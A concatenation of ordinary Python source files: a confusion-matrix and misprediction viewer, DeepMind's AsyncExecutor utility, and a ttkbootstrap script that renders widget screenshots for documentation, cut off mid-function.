valid_label_list = dataset.label_list[dataset.valid_mask]
wrong_pred_mask = valid_label_list!=pred_cls
columns = dataset.class_names
annot = True;
cmap = 'Oranges';
fmt = '.2f'
lw = 0.5
cbar = False
show_null_values = 2
pred_val_axis = 'y'
#size::
fz = 12;
figsize = [9,9];
if(len(valid_label_list) > 10):
fz=9; figsize=[14,14];
cur_plt=plot_confusion_matrix_from_data(valid_label_list, pred_cls, columns,
annot, cmap, fmt, fz, lw, cbar, figsize, show_null_values, pred_val_axis)
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("confusion_matrix")
plt.show()
#
return show_multi_img(dataset,valid_img_path_list[wrong_pred_mask],valid_label_list[wrong_pred_mask],pred_cls[wrong_pred_mask],pred_scores[wrong_pred_mask],dataset.class_names)
def show_multi_img(dataset,img_path_list,label_list,pred_list,pred_scores,class_names):
prefix=""
# max_num = min(len(img_path_list),10)
# img_path_list=img_path_list[:max_num]
# label_list=label_list[:max_num]
# pred_list=pred_list[:max_num]
for index,(img_path,label,pred,score) in enumerate(zip(img_path_list,label_list,pred_list,pred_scores)):
title=prefix+"{}/{} < ".format(str(index+1),len(img_path_list))+"label:"+class_names[label]+",pred:"+class_names[pred]+",score:"+"{:.2f}".format(score)+" >"+"\n"+img_path
image = np.ascontiguousarray(Image.open(img_path).convert('RGB'))
image = dataset.valid_resize_img(image)
plt.imshow(image)
plt.title(title)
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("wrong prediction images")
plt.show()
plt.close()
return list(zip(img_path_list,label_list,pred_list,pred_scores))
|
async_utils.py
|
# Lint as: python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to use within loggers."""
import queue
import threading
from typing import Callable, TypeVar, Generic
from absl import logging
E = TypeVar("E")
class AsyncExecutor(Generic[E]):
"""Executes a blocking function asynchronously on a queue of items."""
def __init__(
self,
fn: Callable[[E], None],
queue_size: int = 1,
interruptible_interval_secs: float = 1.0,
):
"""Buffers elements in a queue and runs `fn` asynchronously..
NOTE: Once closed, `AsyncExecutor` will block until current `fn` finishes
but is not guaranteed to dequeue all elements currently stored in
the data queue. This is intentional so as to prevent a blocking `fn` call
from preventing `AsyncExecutor` from closing.
Args:
fn: A callable to be executed upon dequeuing an element from data
queue.
queue_size: The maximum size of the synchronized buffer queue.
interruptible_interval_secs: Timeout interval in seconds for blocking
queue operations after which the background threads check for errors and
if background threads should stop.
"""
self._data = queue.Queue(maxsize=queue_size)
self._should_stop = threading.Event()
self._errors = queue.Queue()
self._interruptible_interval_secs = interruptible_interval_secs
def _dequeue() -> None:
"""Dequeue data from a queue and invoke blocking call."""
while not self._should_stop.is_set():
try:
element = self._data.get(timeout=self._interruptible_interval_secs)
# Execute fn upon dequeuing an element from the data queue.
fn(element)
except queue.Empty:
# If queue is Empty for longer than the specified time interval,
# check again if should_stop has been requested and retry.
continue
except Exception as e:
logging.error("AsyncExecuter thread terminated with error.")
logging.exception(e)
self._errors.put(e)
self._should_stop.set()
raise # Never caught by anything, just terminates the thread.
self._thread = threading.Thread(target=_dequeue, daemon=True)
self._thread.start()
def _raise_on_error(self) -> None:
try:
# Raise the error on the caller thread if an error has been raised in the
# looper thread.
raise self._errors.get_nowait()
except queue.Empty:
pass
def close(self):
self._should_stop.set()
# Join all background threads.
self._thread.join()
# Raise errors produced by background threads.
self._raise_on_error()
def put(self, element: E) -> None:
"""Puts `element` asynchronuously onto the underlying data queue.
The write call blocks if the underlying data_queue contains `queue_size`
elements for over `self._interruptible_interval_secs` second, in which
case we check if stop has been requested or if there has been an error
raised on the looper thread. If neither happened, retry enqueue.
Args:
element: an element to be put into the underlying data queue and dequeued
asynchronuously for `fn(element)` call.
"""
while not self._should_stop.is_set():
try:
self._data.put(element, timeout=self._interruptible_interval_secs)
break
except queue.Full:
continue
else:
# If `should_stop` has been set, then raises if any has been raised on
# the background thread.
self._raise_on_error()
|
widget_screenshots.py
|
"""
Script for generating Widget screenshots for documentation
"""
from multiprocessing.context import Process
from tkinter import ttk
from ttkbootstrap import Style
from ttkbootstrap import widgets
from ttkbootstrap.gallery.screenshot import Screenshot
# get_screensize = lambda: print((window.winfo_width(), window.winfo_height()))
# window.after(1000, get_screensize)
def screenshot_button(screenshot_on=True, theme='flatly'):
"""
Get screenshot for solid and outline pushbuttons
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/buttons.png')
# solid buttons
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Button(f1, text='TButton', style=f'TButton', width=20).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f1, text=f'{s}.TButton', style=f'{s}.TButton').pack(fill='x', padx=5, pady=10)
# outline buttons
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Outline.TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Button(f2, text='Outline.TButton', style='Outline.TButton').pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f2, text=f'{s}.Outline.TButton', style=f'{s}.Outline.TButton').pack(fill='x', padx=5, pady=10)
# link buttons
f3 = ttk.Frame(window, padding=5)
f3.pack(fill='both', side='left', expand='yes')
ttk.Label(f3, text='Link.TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f3).pack(fill='x', padx=5, pady=5)
ttk.Button(f3, text='Link.TButton', style='Link.TButton', width=20).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f3, text=f'{s}.Link.TButton', style=f'{s}.Link.TButton').pack(fill='x', padx=5, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_checkbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic checkbutton style
"""
style = Style(theme)
window = style.master
window.geometry('272x280')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TCheckbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
for s in style.colors:
b = ttk.Checkbutton(f1, text=f'{s}.TCheckbutton', style=f'{s}.TCheckbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_checkbutton_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Checkbutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-b', text='Check', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-c', text='Check', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_checkbutton_outline_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic outline toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton_outline_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Outline.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Outline.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Checkbutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-b', text='Check', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-c', text='Check', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_roundtoggle_toolbutton():
"""
Get screenshot for a round toggle toolbutton
"""
style = Style()
window = style.master
window.geometry('272x335')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/roundtoggle.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='Roundtoggle.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
# buttons
for s in style.colors:
b = ttk.Checkbutton(f1, text=f'{s}.Roundtoggle.Toolbutton', style=f'{s}.Roundtoggle.Toolbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_squaretoggle_toolbutton():
"""
Get screenshot for a round toggle toolbutton
"""
style = Style()
window = style.master
window.geometry('272x335')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/squaretoggle.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='Squaretoggle.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
# buttons
for s in style.colors:
b = ttk.Checkbutton(f1, text=f'{s}.Squaretoggle.Toolbutton', style=f'{s}.Squaretoggle.Toolbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_primary():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_secondary():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_success():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_info():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_warning():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_danger():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_primary():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_secondary():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_success():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_info():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_warning():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_danger():
"""
Get screenshot for a entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_frame(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a entry
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x500')
ss = Screenshot(window, f'../images/frame.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'TFrame', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
f = ttk.Frame(f5, padding=20, style='TFrame')
f.pack(fill='both', expand='yes')
ttk.Label(f, text=f'TFrame', anchor='center').pack(fill='both', expand='yes')
for c in style.colors:
f = ttk.Frame(f5, padding=20, style=f'{c}.TFrame')
f.pack(fill='both', expand='yes')
ttk.Label(f, text=f'{c}.TFrame', anchor='center', style=f'{c}.Inverse.TLabel').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_label(screenshot_on=True, theme='flatly'):
"""
Get screenshot for labels
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/label.png')
# regular labels
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TLabel', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Label(f1, text='TLabel', style=f'TLabel', width=20, padding=5).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Label(f1, text=f'{s}.TLabel', style=f'{s}.TLabel', padding=5).pack(fill='x', padx=5, pady=10)
# inverse labels
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Inverse.TLabel', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Label(f2, text='Inverse.TLabel', style='Inverse.TLabel', padding=5).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Label(f2, text=f'{s}.Inverse.TLabel', style=f'{s}.Inverse.TLabel', padding=5).pack(fill='x', padx=5,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_labelframe(screenshot_on=True, theme='flatly'):
"""
Get screenshot for labelframes
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x600')
ss = Screenshot(window, '../images/labelframe.png')
# header
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TLabelframe', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Labelframe(f1, text='TLabelframe', style='TLabelframe', padding=10).pack(fill='both', expand='yes', padx=10,
pady=10)
for c in style.colors:
ttk.Labelframe(f1, text=f'{c}.TLabelframe', style=f'{c}.TLabelframe', padding=10).pack(fill='both',
expand='yes', padx=10,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_menubutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for solid and outline menubuttons
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/menubutton.png')
# solid menubuttons
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TMenubutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Menubutton(f1, text='TMenubutton', style=f'TMenubutton', width=25).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Menubutton(f1, text=f'{s}.TMenubutton', style=f'{s}.TMenubutton').pack(fill='x', padx=5, pady=10)
# outline menubuttons
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Outline.TMenubutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Menubutton(f2, text='Outline.TMenubutton', style='Outline.TMenubutton', width=25).pack(fill='x', padx=5,
pady=10)
for s in style.colors:
ttk.Menubutton(f2, text=f'{s}.Outline.TMenubutton', style=f'{s}.Outline.TMenubutton').pack(fill='x', padx=5,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_notebook(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a notebook
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x300')
ss = Screenshot(window, '../images/notebook.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# widget
nb = ttk.Notebook(f1)
f6 = ttk.Frame(nb)
nb.add(f6, text='Tab 1')
nb.add(ttk.Frame(nb), text='Tab 2')
nb.add(ttk.Frame(nb), text='Tab 3')
ttk.Label(f6, text='TNotebook', font='Helvetica 10 bold', anchor='center').pack(fill='both', expand='yes', pady=5)
nb.pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal progressbars
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TProgressbar').pack(fill='x', padx=10)
ttk.Progressbar(f1, value=75, style=f'{c}.Horizontal.TProgressbar').pack(fill='x', expand='yes', padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_horizontal_striped(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal striped progressbars
"""
style = Style(theme)
